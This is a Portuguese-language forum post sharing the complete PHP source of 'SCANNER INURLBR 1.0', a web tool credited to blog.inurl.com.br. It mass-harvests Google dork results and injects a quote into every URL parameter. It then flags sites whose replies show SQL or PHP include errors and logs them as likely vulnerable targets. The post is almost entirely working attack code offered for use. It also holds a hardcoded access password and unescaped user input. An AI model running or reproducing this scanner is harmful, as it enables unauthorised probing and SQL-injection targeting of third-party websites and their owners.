Ta na web vendo umas coisas quando...Vejo isso um scan de SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
Mais informações esta na propria soucer ae
Créditos:blog.inurl.com.br
Mais informações esta na propria soucer ae
Código PHP:
<?php
/*
##########################################################################################
* SCANNER INURLBR 1.0
* PHP Version 5.4.7
* php5-curl LIB
* cURL support enabled
* cURL Information 7.24.0
* Apache 2.4
* allow_url_fopen = On
* Motor de busca GOOGLE
* Permição Leitura & Escrita
* -------------------------------------------------------------------------------------
* BUSCA POSSÍVEIS VULNERABILIDADES
* SQLI(MySQL,MS ACCESS,Microsoft SQL Server,ORACLE,POSTGRESQL) OU ERROS DE PROGRAMAÇÃO.
*
* GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
* fb.com/GoogleINURL
* twitter.com/GoogleINURL
* blog.inurl.com.br
##########################################################################################
*/
error_reporting(0);
ini_set("max_execution_time", 0);
ini_set("allow_url_fopen", 1);
ini_set("default_socket_timeout", 5);
if (!isset($_SESSION)) {
session_start();
}
if (isset($_GET['senha']) && $_GET['senha'] == 'googleinurl') { // VALIDANDO SENHA:googleinurl
$_SESSION['valida'] = 1; //SETANDO O VALIDADOR DA PAGINA
}
if ($_SESSION['valida'] != 1) { // SE _SESSION VALIDA for diferente de 1 ele não deixa pagina ser carregada
echo 'SEM ACESSO!';
unset($_SESSION['valida']);
EXIT();
}
if (isset($_GET['sair']) && $_GET['sair'] == 'ok') { //SAIR DO SISTEMA
unset($_SESSION['valida']);
session_destroy();
EXIT();
}
if (preg_match('|MSIE ([0-9].[0-9]{1,2})|', $_SERVER['HTTP_USER_AGENT'])) {
echo "<h1 style='text-size:14px;text-align:center;'>Favor usar um navegador que preste!</br>Please use a browser that pay!<br>
<img src='http://1.bp.blogspot.com/_0MpBNlJrdds/TU0x2KYVbQI/AAAAAAAAAbM/ryjvYAy32K4/s320/Fuck%2BYou.png'></h1>";
EXIT();
}
if ($_GET['comando'] == 'phpinfo') {
phpinfo();
echo "
<style>
body{
background-color:#0000;
background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/533575_576672729050119_54987398_n.jpg');
background-repeat: no-repeat;
background-attachment: fixed; }
h2{
color:#fff;
}
h1{
color:#fff;
}
.e {background-color: #000; font-weight: bold; color: #fff;}
.v {background-color: #000; font-weight: bold; color: #fff;}
td, th { border: 1px solid #fff; font-size: 75%; vertical-align: baseline;}
</style>
";
EXIT();
}
$_SESSION['vull_style'] = NULL;
$_SESSION['resultado_vull'] = NULL;
?>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >
<head>
<title>SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]</title>
<link href='http://fonts.googleapis.com/css?family=Aldrich' rel='stylesheet' type='text/css'>
<style>
body
{
background-color:#000000;
background-repeat: no-repeat;
background-attachment: fixed;
background-image: url('https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash3/533575_576672729050119_54987398_n.jpg');
background-width: 100%;
background-height: 100%;
background-size: 100%;
font-family: 'Aldrich', sans-serif;
_height: 100%;
_overflow: auto;
}
h1
{
color:#006400;
text-align:center;
}
info{
color:#fff;
text-align:center;
}
cont{
color:#900000;
text-align:center;
}
vull{
color:#900000;
}
campoHttp{
color:#0066FF;
}
valorHttp{
color:#003399;
}
p,label
{
font-size:20px;
color:#00FF00;
}
a:link, a:visited, a:active {
text-decoration: none;
color:#fff;
}
a:hover {text-decoration: underline;
color:#fff;
font-size:105%;
}
ico{
width: 16px;
height: 16px;
}
.bordas {
background:#000;
border-color: #1C1C1C;
border-width: 1px;
border-style: solid;
margin: auto;
padding:10px;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
opacity:0.75;
-moz-opacity: 0.75;
filter: alpha(opacity=75);
}
.resultado {
background:#000;
border-color: #fff;
border-width: 1px;
border-style: solid;
color:#fff;
margin: auto;
width: 95%;
padding:10px;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
opacity:0.85;
-moz-opacity: 0.85;
filter: alpha(opacity=85);
}
.botao {
background-color: #000;
font: 14px Arial, sans-serif;
color: #006400;
}
input {
background:#000;
border:1px dashed #006400;
color: #fff;
-moz-border-radius:7px;
-webkit-border-radius:7px;
border-radius:7px;
}
#menu-vertical{
position:fixed;
top:120px;
overflow:hidden;
}
</style>
</style>
<script type="text/javascript">
function popUpCal(url)
{
var width = screen.width;
var height = screen.height;
var left = parseInt((screen.availWidth / 2) - (width / 2));
var top = parseInt((screen.availHeight / 2) - (height / 2));
var windowFeatures = "width=1000,height=1000,scrollbars=1,status=0,resizable=1,left=" + left + ",top=" + top +
"screenX=" + left + ",screenY=" + top + "";
window.open(url + "&w=" + width + "&h=" + height, "", windowFeatures, "GET");
}
</script>
</head>
<body >
<center>
<img src='http://1.bp.blogspot.com/-TY7dceLe804/UEBFN6hZW7I/AAAAAAAABM8/ypZu2cl6HCU/s1600/defacement.png' style='height: 100px;'/><br>
<a href="http://blog.inurl.com.br" title="BLOG GOOGLE INURL - BUSCA AVANÇADA" alt="BLOG INURL - BUSCA AVANÇADA">SCANNER INURLBR 1.0 - [ blog.inurl.com.br ]</a>
</center>
<div class='resultado' >
<form action="bot.php" method="post">
<label>DORK...: <input type="text" value='<?php echo isset($_POST['dork']) ? $_POST['dork'] : ''; ?>' name="dork" size="60"></label>
<label>PROXY..: <input type="text" value='<?php echo isset($_POST['dork']) ? $_POST['proxy'] : ''; ?>' name="proxy" size="15"></label>
<label>PORTA..: <input type="text" value='<?php echo isset($_POST['dork']) ? $_POST['porta'] : ''; ?>' name="porta" size="9"></label> /
<label><input class="botao" type="submit" value="Pesquisar..."></label>
<label><a href="#" style='margin:5px;' onclick="javascript:popUpCal('bot.php?comando=phpinfo')">INFOPHP</a></label>
<label><a href="bot.php?sair=ok" style='margin:10px;'>[ x ]</a></label>
<p><label>ARQUIVO DE SAÍDA..: <input type="text" value='<?php echo isset($_POST['arquivo']) ? $_POST['arquivo'] : 'resultados.txt'; ?>' name="arquivo" size="30"></label></p>
</form>
</div>
<div class='resultado' >
<?php
$config[] = array();
$config['dork'] = urlencode(opcao(isset($_POST['dork']) ? $_POST['dork'] : '', "DORK"));
$config['arquivo'] = opcao($_POST['arquivo'], "ARQUIVO");
$config['ipProxy'] = (isset($_POST['proxy']) && !empty($_POST['proxy'])) ? $_POST['proxy'] : NULL;
$config['porta'] = (isset($_POST['porta']) && !empty($_POST['porta'])) ? $_POST['porta'] : NULL;
$config['url'] = "/search?q={$config['dork']}&num=1500&btnG=Search";
$config['host'] = "www.google.com.br";
$config['port'] = 80;
$packet = "GET {$config['url']} HTTP/1.0\r\n";
$packet.="Host: {$config['host']}\r\n";
$packet.="Connection: Close\r\n\r\n";
function opcao($valor, $op) {
if (isset($valor) && !empty($valor)) {
return $valor;
} else {
echo "<info>FALTA DEFINIR..::: {$op}</info>
<center>
<p>
<a href='http://blog.inurl.com.br' title='BLOG GOOGLE INURL - BUSCA AVANÇADA' alt='BLOG INURL - BUSCA AVANÇADA'>[ blog.inurl.com.br ]</a>
</p>
</center>
";
exit();
}
}
function eviarPacote($packet, $config) {
if (isset($config['ipProxy'])) {
$ock = fsockopen($config['ipProxy'], $config['porta']);
if (!$ock) {
echo "<info>Proxy não responde {$config['ipProxy']} : {$config['porta']}</info>";
die;
}
} else {
$ock = fsockopen(gethostbyname($config['host']), $config['port']);
if (!$ock) {
echo "<info>Host não responde {$config['host']} : {$config['port']}</info>";
die;
}
}
fputs($ock, $packet);
$buffer = NULL;
while (!feof($ock)) {
$buffer.=fgets($ock);
}
fclose($ock);
return($buffer);
}
function infoserver($url_) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url_);
curl_setopt($c, CURLOPT_HEADER, 1);
curl_setopt($c, CURLOPT_NOBODY, 0);
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($c, CURLOPT_FRESH_CONNECT, 1);
curl_setopt($c, CURLOPT_VERBOSE, 1);
$corpo = (curl_exec($c));
if (isset($corpo)) {
$dadoTipoBD = verificaErro($corpo);
$_SESSION['vull_style'] = (isset($dadoTipoBD) && !empty($dadoTipoBD)) ? 'style="color:#006400;"' : NULL;
$_SESSION['resultado_vull'].=(isset($dadoTipoBD) && !empty($dadoTipoBD)) ? "|{$url_}" : NULL;
} else {
return FALSE;
}
$server = curl_getinfo($c);
$sys = get_headers($url_);
return $info = "
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/counter-icon.png'/>/ HTTP_CODE:</campoHttp>
<valorHttp>{$server['http_code']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/ip-class-icon.png'/>/ IP SERVER:</campoHttp>
<valorHttp>{$server['primary_ip']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/door-in-icon.png'/>/ PORTA SERVER:</campoHttp>
<valorHttp>{$server['primary_port']}</valorHttp>
<campoHttp><img src='http://icons.iconarchive.com/icons/fatcow/farm-fresh/24/computer-go-icon.png'/>/ WEB SERVER:</campoHttp>
<valorHttp>{$sys['2']}</valorHttp><br>
<vull>{$dadoTipoBD}</vull>
";
}
function formatarResult($html) {
preg_match_all('#\b((((ht|f)tps?://)|(www|ftp)\.)[a-zA-Z0-9\.\#\@\:%_/\?\=\~\-]+)#i', $html, $match);
$contUrl = 1;
$contTotal = 0;
$match[1] = array_unique($match[1]);
for ($i = 0; $i < count($match[1]); $i++) {
if (isset($match[1][$i]) && !strstr($match[1][$i], "google") && !strstr($match[1][$i], "youtube") && !strstr($match[1][$i], "orkut") && !strstr($match[1][$i], "schema") && !strstr($match[1][$i], "blogger")) {
$info = infoserver(gerarErroDB(urldecode($match[1][$i])));
$url = gerarErroDB(urldecode($match[1][$i]));
$url = "<a target='_black' href={$url} {$_SESSION['vull_style']}>{$url}</a>";
echo "<p class='bordas'>
<info>[<cont>{$contUrl}</cont>] - </info> <url>{$url}</url> </br>{$info}
</p>";
$contUrl++;
$contTotal++;
}
}
$resultado = (isset($_SESSION['resultado_vull'])) ? $_SESSION['resultado_vull'] : exit();
$resultado = explode("|", $resultado);
$contRes = count($resultado) - 1;
$resultadotxt = NULL;
$nomeArquivo = "{$_POST['arquivo']}";
$resultadotxt = base64_decode("U0NBTk5FUiBJTlVSTEJSIDEuMCAtIFsgYmxvZy5pbnVybC5jb20uYnIgXQ==") . " /DATA:" . date("d/m/Y H:i:s") . " /DORK:{$_POST['dork']}\r\nTOTAL VULL:{$contRes}\r\n " . implode("\r\n", $resultado) . "\r\n\r\n";
$resultado = implode("<br>", $resultado);
print_r("<div class='resultado'>
<p>TOTAL DE URL's: <info>{$contTotal}</info></p>
<p>DORK: <info>{$_POST['dork']}</info></p>
<p>TOTAL DE POSSÍVEIS VULL: <info>{$contRes}</info></p>
<p>ARQUIVO COM RESULTADO: <info><a href='{$nomeArquivo}' target='_black'>{$nomeArquivo}</a></info></p>
<p>LISTA: </p>
<p>{$resultado}<p>
</div>");
$_SESSION['resultado_vull'] = NULL;
$abrirtxt = fopen($nomeArquivo, "a");
if ($abrirtxt == false) {
die('Não foi possível criar o arquivo.');
}
fwrite($abrirtxt, $resultadotxt);
fclose($abrirtxt);
}
function validaBD($html_, $verificar, $bd) {
return (strstr($html_, $verificar)) ? $bd : null;
}
function verificaErro($html_) {
#ERROS BANCO DE DADOS
$erro['MYSQL-01'] = 'mysql_';
$erro['MYSQL-02'] = 'You have an error in your SQL syntax;';
$erro['MYSQL-03'] = 'Warning: mysql_';
$erro['MICROSOFT-01'] = 'Microsoft JET Database';
$erro['MICROSOFT-02'] = 'ODBC Microsoft Access Driver';
$erro['MICROSOFT-03'] = '500 - Internal server error';
$erro['MICROSOFT-04'] = 'Microsoft OLE DB Provider';
$erro['MICROSOFT-05'] = 'Unclosed quotes';
$erro['ORACLE-01'] = 'Microsoft OLE DB Provider for Oracle';
$erro['POSTGRESQL-01'] = 'pg_';
$erro['POSTGRESQL-02'] = 'Warning: pg_';
$erro['POSTGRESQL-03'] = 'PostgreSql Error:';
$erro['INDEFINIDO-01'] = 'SQL';
$erro['INDEFINIDO-02'] = 'syntax;';
#ERROS PHP
$erro['ERROPHP-01'] = 'Warning: include';
$erro['ERROPHP-02'] = 'Fatal error: include';
$erro['ERROPHP-03'] = 'Warning: require';
$erro['ERROPHP-04'] = 'Fatal error: require';
$erro['ERROASP-01'] = 'Version Information: Microsoft .NET Framework';
foreach ($erro as $campo => $valor) {
if (validaBD($html_, $erro[$campo], $campo)) {
return("Tipo de erro: {$campo} - ERRO: {$erro[$campo]}");
}
}
}
function gerarErroDB($_url) {
$_url = explode("&", $_url);
$_url = implode("'0x27&", $_url) . "'0x27";
return $_url;
}
$html = eviarPacote($packet, $config);
print_r(formatarResult($html));
?>
<center>
<p>
<a href="http://blog.inurl.com.br" title="BLOG GOOGLE INURL - BUSCA AVANÇADA" alt="BLOG INURL - BUSCA AVANÇADA">[ blog.inurl.com.br ]</a>
</p>
</center>
</div>
</body>
Comment